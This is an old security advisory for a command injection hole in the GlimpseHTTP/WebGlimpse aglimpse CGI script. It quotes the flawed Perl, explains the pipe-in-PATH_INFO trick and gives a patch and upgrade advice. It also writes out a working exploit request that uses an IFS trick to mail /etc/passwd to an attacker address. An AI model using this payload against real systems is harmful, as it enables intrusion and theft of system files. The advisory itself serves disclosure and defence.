COMMAND

    /cgi-bin/aglimpse

SYSTEMS AFFECTED

    GlimpseHTTP 2.0 and WebGlimpse versions prior to 1.5

PROBLEM

    Another HTTP vulnerability, this time in a small utility:  Glimpse
    HTTP  which  is  an  interface  to  the Glimpse search tool. It is
    written in PERL.   The hole is small  one but it can  allow you to
    execute any  command on  the remote  system (as  the owner  of the
    http server).

    Quote from the source (latest version at time of exploit):

    --begin--

    $path_info = $ENV{'PATH_INFO'};
    $_ = $path_info;

    # /<length>/$indexdir/$path is the format of the PATH_INFO

    # might as well start the message now print "Content-type: text/html\n\n";
    print "<HTML>\n"; print "<HEAD>\n";

    if ( m|^/([0-9]*)(.*)$| ) {
            $length = $1;
            $path = $2;
            $path =~ s|"||g;  } else {
            &err_badargs;  }

    $indexdir = substr($path,0,$length);
    $relpath = substr($path,$length,length($path));

    # print "<br>indexdir=$indexdir<br>relpath=$relpath<br>";

    open(CONF,"$indexdir/archive.cfg") || &err_conf;

    --end--

    As you may see,  it  splits PATH_INFO  in two fields: $length  and
    $path and then takes the  first $length characters from $path  and
    puts them in $indexdir.  The last line opens "$indexdir/archive.cfg".

    Now for  the evil  part.   By setting  $indexdir to  a string that
    begins with '|', the system  will execute whatever it finds  after
    the pipe, giving it as STDIN what you write to the CONF handle.

    The bad thing is that most HTTP servers won't let you use TABS  or
    SPACES in the PATH_INFO (not the case of Netscape servers  anyway,
    but CERN and Apache  will do it). And  I don't know how  many "one
    word" commands can anyone find (and make them do evil).

    Here's where the famous IFS variable comes handy.  If $indexdir
    is set to something like:

    "|IFS=5;CMD=5mail5your_address\@your_computer.com\</etc/passwd;eval$CMD;echo"

    it will  execute the  command in  CMD using  IFS as separator. The
    one above sends me your /etc/passwd.   The last "echo" is used  to
    ignore the rest of the string. An of course you can use any  other
    separator instead of "5".

    Now for the exploit:

        telnet target.machine.com 80

        GET /cgi-bin/aglimpse/80|IFS=5;CMD=5mail5your_address\@your_computer.com\</etc/passwd;eval$CMD;echo
        HTTP/1.0

    Note that the  cgi-bin directory could  be located somewhere  else
    (for example in /scripts or  /cgi or a special directory  just for
    glimpse...).  Also note that you HAVE to use all those  backslahes
    in the command  (perl wants them  there!).  Credit  goes to Razvan
    Dragomirescu.

SOLUTION

    Insert this  code directly  above the  open line  below (see  code
    before). Credit goes to Brian L. Gentry.

    if($indexdir =~ tr/;<>*|`&$!#()[]{}:'"//) {
            print "<H1>Evil characters found! Exiting.</H1>";
            exit(1);
      }

    > open(CONF,"$indexdir/archive.cfg") || &err_conf;
    >
    > --end--

    The  authors  have  decided  to  stop  supporting GlimpseHTTP, and
    instead have released a new version (1.5) of WebGlimpse, which has
    most of the features of GlimpseHTTP  and many more.  Users of  any
    version  GlimpseHTTP  are  encouraged   to  upgrade  to  the   new
    WebGlimpse.   Users  of  earlier  versions  of WebGlimpse are also
    encouraged to  upgrade, as  version 1.5  is more  robust and  more
    secure.  WebGlimpse can be found at:

        http://glimpse.cs.arizona.edu/webglimpse/

    For sites that cannot  immediately install the current  version of
    WebGlimpse,  it  is  recommended  that  you disable the version of
    GlimpseHTTP or WebGlimpse you are using and use another script  to
    interface to Glimpse or applay patch.